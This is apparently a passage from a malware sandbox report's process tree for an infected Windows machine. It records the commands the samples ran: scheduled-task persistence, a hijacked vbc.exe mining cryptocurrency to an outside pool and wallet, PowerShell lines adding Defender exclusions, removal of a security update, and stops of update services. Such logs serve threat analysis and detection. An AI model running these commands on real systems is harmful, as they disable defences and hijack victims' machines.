  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEFF0.tmp.bat""
      4⤵
      PID:7928
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:9212
    - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:756
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        
        PID:2736
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:7376
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        6⤵
        
        PID:3336
- - C:\Users\Admin\AppData\Local\Temp\Files\native.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
    3⤵
    PID:7548
  - - C:\Users\Admin\AppData\Local\Temp\Files\native.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
      4⤵
      PID:5128
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 468
        5⤵
        Program crash
        
        PID:8168
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 472
        5⤵
        Program crash
        
        PID:5816
- - C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Windows.exe"
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\EhStorAuthn.exe
    "C:\Windows\SysWOW64\EhStorAuthn.exe"
    3⤵
    PID:6764
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:9212
- - C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
    3⤵
    PID:7864
  - - C:\Users\Admin\AppData\Local\Temp\is-AA9LB.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-AA9LB.tmp\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.tmp" /SL5="$70360,1495449,832512,C:\Users\Admin\AppData\Local\Temp\Files\%E5%88%9D%E5%A6%86%E5%8A%A9%E6%89%8B.exe"
      4⤵
      PID:8164
- - C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
    3⤵
    PID:6828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5868
- - C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f000766.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f000766.exe"
    3⤵
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
      "C:\Users\Admin\AppData\Local\Temp\ISetup4.exe"
      4⤵
      PID:6588
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 496
        5⤵
        Program crash
        
        PID:572
  - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
      "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
      4⤵
      PID:5528
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5532
    - - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
        
        "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
        5⤵
        
        PID:8452
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7464
- - C:\Users\Admin\AppData\Local\Temp\Files\060.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\060.exe"
    3⤵
    PID:7932
  - - C:\Users\Admin\AppData\Local\Temp\is-U5BBQ.tmp\060.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-U5BBQ.tmp\060.tmp" /SL5="$103EA,4328255,54272,C:\Users\Admin\AppData\Local\Temp\Files\060.exe"
      4⤵
      PID:8880
    - - C:\Users\Admin\AppData\Local\CD Studio\cdstudio32.exe
        
        "C:\Users\Admin\AppData\Local\CD Studio\cdstudio32.exe" -i
        5⤵
        
        PID:6040
    - - C:\Users\Admin\AppData\Local\CD Studio\cdstudio32.exe
        
        "C:\Users\Admin\AppData\Local\CD Studio\cdstudio32.exe" -s
        5⤵
        
        PID:8104
- - C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
    3⤵
    PID:3252
- - C:\Users\Admin\AppData\Local\Temp\Files\pt.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pt.exe"
    3⤵
    PID:5144
  - - C:\Windows\system32\cmd.exe
      "cmd" /C tasklist
      4⤵
      PID:1504
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:8828
- - C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe"
    3⤵
    PID:5992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 1144
      4⤵
      Program crash
      PID:7428
- - C:\Users\Admin\AppData\Local\Temp\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\AppData\Local\Temp\Files\%E7%A6%81%E6%AD%A2%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:3696
- - C:\Users\Admin\AppData\Local\Temp\Files\pgifswa.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pgifswa.exe"
    3⤵
    PID:6188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:784
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd7d55ab58,0x7ffd7d55ab68,0x7ffd7d55ab78
    3⤵
    PID:6228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:2
    3⤵
    PID:7028
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:8
    3⤵
    PID:6656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2148 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:8
    3⤵
    PID:8736
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:1
    3⤵
    PID:8704
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3244 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:1
    3⤵
    PID:3740
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4164 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:8
    3⤵
    PID:8608
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3440 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:8
    3⤵
    PID:3068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4396 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:8
    3⤵
    PID:5744
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3456 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:1
    3⤵
    PID:7728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4224 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:1
    3⤵
    PID:8548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4360 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:8
    3⤵
    PID:828
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4960 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:1
    3⤵
    PID:2352
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:8
    3⤵
    PID:6320
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4848 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:1
    3⤵
    PID:8500
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4444 --field-trial-handle=1748,i,3095001897028687894,15303647093884505153,131072 /prefetch:2
    3⤵
    PID:4692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3504

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3956

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3976

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4456

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2780

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2972

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4068

C:\Windows\nslfoo.exe
C:\Windows\nslfoo.exe
1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:3892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:2140
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4536 -ip 4536
  2⤵
  PID:1296
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2648 -ip 2648
  2⤵
  PID:2960
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1488 -ip 1488
  2⤵
  PID:2260
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4292 -ip 4292
  2⤵
  PID:3784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2520 -ip 2520
  2⤵
  PID:5612
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2520 -ip 2520
  2⤵
  PID:5904
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3244 -ip 3244
  2⤵
  PID:6072
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6768 -ip 6768
  2⤵
  PID:7956
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3244 -ip 3244
  2⤵
  PID:8128
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6768 -ip 6768
  2⤵
  PID:8996
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6768 -ip 6768
  2⤵
  PID:7548
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6768 -ip 6768
  2⤵
  PID:5396
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 8140 -ip 8140
  2⤵
  PID:5668
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6768 -ip 6768
  2⤵
  PID:8724
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6768 -ip 6768
  2⤵
  PID:6884
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6768 -ip 6768
  2⤵
  PID:7076
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6768 -ip 6768
  2⤵
  PID:4872
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6768 -ip 6768
  2⤵
  PID:6736
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6768 -ip 6768
  2⤵
  PID:8492
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5216 -ip 5216
  2⤵
  PID:8748
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1204 -ip 1204
  2⤵
  PID:8328
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1204 -ip 1204
  2⤵
  PID:6608
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 1204 -ip 1204
  2⤵
  PID:7440
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1204 -ip 1204
  2⤵
  PID:5124
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1204 -ip 1204
  2⤵
  PID:8716
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1204 -ip 1204
  2⤵
  PID:2080
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1204 -ip 1204
  2⤵
  PID:4904
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1204 -ip 1204
  2⤵
  PID:1212
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1204 -ip 1204
  2⤵
  PID:6864
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1204 -ip 1204
  2⤵
  PID:6544
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1204 -ip 1204
  2⤵
  PID:1732
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1204 -ip 1204
  2⤵
  PID:8272
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1204 -ip 1204
  2⤵
  PID:6504
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1204 -ip 1204
  2⤵
  PID:8348
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5864 -ip 5864
  2⤵
  PID:6484
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 8004 -ip 8004
  2⤵
  PID:5912
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1204 -ip 1204
  2⤵
  PID:3204
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7992 -ip 7992
  2⤵
  PID:8356
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1204 -ip 1204
  2⤵
  PID:1296
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 8312 -ip 8312
  2⤵
  PID:5632
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7664 -ip 7664
  2⤵
  PID:1032
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 828 -ip 828
  2⤵
  PID:5452
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 828 -ip 828
  2⤵
  PID:1552
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 8796 -ip 8796
  2⤵
  PID:8048
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6080 -ip 6080
  2⤵
  PID:6616
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1204 -ip 1204
  2⤵
  PID:6784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1204 -ip 1204
  2⤵
  PID:8164
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1204 -ip 1204
  2⤵
  PID:5424
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4944 -ip 4944
  2⤵
  PID:7552
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1204 -ip 1204
  2⤵
  PID:8808
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1204 -ip 1204
  2⤵
  PID:8648
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5128 -ip 5128
  2⤵
  PID:8276
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1204 -ip 1204
  2⤵
  PID:5600
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5128 -ip 5128
  2⤵
  PID:5084
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7636 -ip 7636
  2⤵
  PID:6784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6588 -ip 6588
  2⤵
  PID:8656
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6248 -ip 6248
  2⤵
  PID:5684
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 2688 -ip 2688
  2⤵
  PID:8796
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 1204 -ip 1204
  2⤵
  PID:6976
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4952 -ip 4952
  2⤵
  PID:6960
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1204 -ip 1204
  2⤵
  PID:9064
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 8220 -ip 8220
  2⤵
  PID:864
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5992 -ip 5992
  2⤵
  PID:4064
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 8220 -ip 8220
  2⤵
  PID:1832
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1204 -ip 1204
  2⤵
  PID:7216
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6472 -ip 6472
  2⤵
  PID:412

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4948

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4268

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:1520

C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
1⤵
PID:5128
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5248
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:6688
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6156
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6288
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3576
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:7656
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5540
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1304
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:6740
- C:\Windows\system32\dialer.exe
